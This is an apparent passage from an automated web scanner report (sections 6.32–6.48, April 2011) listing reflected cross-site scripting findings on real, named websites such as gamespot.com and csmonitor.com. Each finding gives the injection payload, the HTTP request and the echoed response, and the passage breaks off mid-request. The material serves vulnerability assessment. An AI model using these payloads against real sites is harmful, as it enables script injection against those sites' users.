X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico3b192--><a>42b747ad359 -->
...[SNIP]...

6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a67'-alert(1)-'dd8390ff089 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88a67'-alert(1)-'dd8390ff089 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:32 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app2v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56303
Date: Sat, 02 Apr 2011 14:20:32 GMT
X-Varnish: 878005112
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<scr'+'ipt language="JavaScript" src="http://n4403ad.doubleclick.net/adj/gn.cr.craveonline.com/favicon.ico88a67'-alert(1)-'dd8390ff089;sect=favicon.ico88a67'-alert(1)-'dd8390ff089;ct=favicon.ico88a67'-alert(1)-'dd8390ff089;ci=;sz=1000x1000;tile='+(gnm_tile++)+';ord=' + gnm_ord + '?">
...[SNIP]...

6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6502"-alert(1)-"527e231a44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d6502"-alert(1)-"527e231a44 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 13:27:22 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86384
Expires: Sun, 03 Apr 2011 13:27:07 GMT
Date: Sat, 02 Apr 2011 13:27:23 GMT
Content-Length: 21591
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/d6502"-alert(1)-"527e231a44";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5f5'-alert(1)-'7263aba8059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9d5f5'-alert(1)-'7263aba8059 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: user_guid=1a45ceec-1c83-4750-a66d-bb53ea4fe27b; expires=Fri, 02-Apr-2021 13:31:59 GMT; path=/
Set-Cookie: first_time=1; domain=docstoc.com; path=/
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: session.docstoc=d10a866a-2296-4f61-9582-da96250ad728; path=/
Set-Cookie: memguid.docstoc=811a77f3-6db6-4f0f-9360-a701e8733536; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: fingerprint.docstoc={"FingerprintId":"","DMA":"","City":"","Region":"","Country":"","Fonts":"","Plugins":"","UserAgent":"","IpAddress":"","Resolution":""}; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: pages_visited=1; path=/
Set-Cookie: general=showTopIE9=1,1,4/3/2011 6:31:59 AM; domain=docstoc.com; expires=Mon, 02-Apr-2012 13:31:59 GMT; path=/
Set-Cookie: cartItemCount=0; expires=Mon, 02-May-2011 13:31:59 GMT; path=/
serverID: www2
Date: Sat, 02 Apr 2011 13:31:58 GMT
Content-Length: 15433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
insertBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2ffavicon.ico9d5f5'-alert(1)-'7263aba8059';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8b31<a>cfeca55b272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c8b31<a>cfeca55b272 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.domaintools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sat, 02 Apr 2011 14:45:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:45:19 GMT
Content-Length: 11939
Connection: close
Set-Cookie: dtsession=0c96c752b97d8eeab552cf2acdcba16d; expires=Tue, 30 Mar 2021 13:45:19 GMT; path=/; domain=.domaintools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>cfeca55b272">Whois record for "c8b31<a>cfeca55b272"</a>
...[SNIP]...

6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27027"-alert(1)-"893baf0fdc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27027"-alert(1)-"893baf0fdc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driverside.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:11 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SelectedCarID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedTrimID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedStyleID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: TplType=2; expires=Mon, 09-May-2011 01:39:12 GMT; path=/
Set-Cookie: Ds_client=ed826f9ef3019c3a25abefb6fd651b0d; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: UUID=DS-7fa5332a-91f8-76bb-ffa3-9ec63b1c8a2c; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: business_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: partner_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
<!--

/* Copyright 1997-2004 Omniture, Inc. */
s.prop1="DS";
s.prop2="Sat";
s.prop3="06";
s.prop7="/favicon.ico27027"-alert(1)-"893baf0fdc8";
s.prop15="unregistered";
s.prop16="logged out";
s.prop17="non-member";
s.eVar1="DS";
s.eVar12="Sat";
s.eVar13="06";
s.eVar15="unregistered";
s.eVar16="logged out";
s.eVar17="non-member";
s.zip=""
/*
...[SNIP]...

6.37. http://www.education.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.education.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a97"%3b06af93cafcd was submitted in the REST URL parameter 1. This input was echoed as d2a97";06af93cafcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icod2a97"%3b06af93cafcd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:35:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=fhkbhen0kd9vs4jlqhf6ju3g10; expires=Sat, 02-Apr-2011 23:35:10 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Tue, 14-Jun-2011 13:35:10 GMT; path=/
Content-Length: 140381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
s.pageType="errorPage";
if(!s.channel) s.channel="favicon.icod2a97";06af93cafcd";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...

6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15911"><a>dcba971d871 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico15911"><a>dcba971d871 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" name="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911"><A>DCBA971D871EDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911">
...[SNIP]...

6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bbdc<script>alert(1)</script>7e8efe51f47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://www.egotastic.com/favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47" seems to be missing.</p>
...[SNIP]...

6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7526b<script>alert(1)</script>c49fd957cea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7526b<script>alert(1)</script>c49fd957cea HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1173
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
   <a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/favicon.ico7526b<script>alert(1)</script>c49fd957cea</font>
...[SNIP]...

6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 66975</title><script>alert(1)</script>b548febdb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico66975</title><script>alert(1)</script>b548febdb4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1419
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico66975</title><script>alert(1)</script>b548febdb4d not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
...[SNIP]...

6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4097f<script>alert(1)</script>ca01e159581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4097f<script>alert(1)</script>ca01e159581 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1403
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   fo
...[SNIP]...
<h1>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</h1>
...[SNIP]...

6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 4ae7d</title><script>alert(1)</script>1082cba203e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:04 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1425
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body

...[SNIP]...

6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48892<script>alert(1)</script>4686b36e033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?48892<script>alert(1)</script>4686b36e033=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:03 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1409
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{

...[SNIP]...
<h1>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</h1>
...[SNIP]...

6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc61f'%3bd646a62950f was submitted in the REST URL parameter 1. This input was echoed as cc61f';d646a62950f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icocc61f'%3bd646a62950f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydayhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File Not Found
Date: Sat, 02 Apr 2011 13:27:14 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=Acwny4THb9g0MzViZGNkYi0xYTc0LTQxYTEtOGNlYy1jMjZhMDg0NDQ3NGM1; expires=Sat, 11-Jun-2011 00:07:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=kijeui555z3zjjmaqxna4s55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/favicon.icocc61f';d646a62950f', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cd8"><script>alert(1)</script>0043b9c4893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico95cd8"><script>alert(1)</script>0043b9c4893 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:07 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGQ5NzI0MmJhZGMxZDZmM2I2YzQ0ZDQ4NzY1ZQ%3D%3D; expires=Thu, 29-Sep-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040211=1; expires=Tue, 05-Apr-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/favicon.ico95cd8"><script>alert(1)</script>0043b9c4893" />
...[SNIP]...

6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 599e8'a%3d'b'629f0608bc6 was submitted in the REST URL parameter 1. This input was echoed as 599e8'a='b'629f0608bc6 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico599e8'a%3d'b'629f0608bc6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:33:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 13:33:25 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: LandingUrl=http://www.gamestop.com/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6; path=/
Set-Cookie: CampaignHistory=; path=/
Set-Cookie: BIGipServerwww.gamestop.com-80=600446124.20480.0000; path=/
Content-Length: 181788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b was submitted in the REST URL parameter 1. This input was echoed as 12711<img src=a onerror=alert(1)>929de4ce53b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b HTTP/1.1
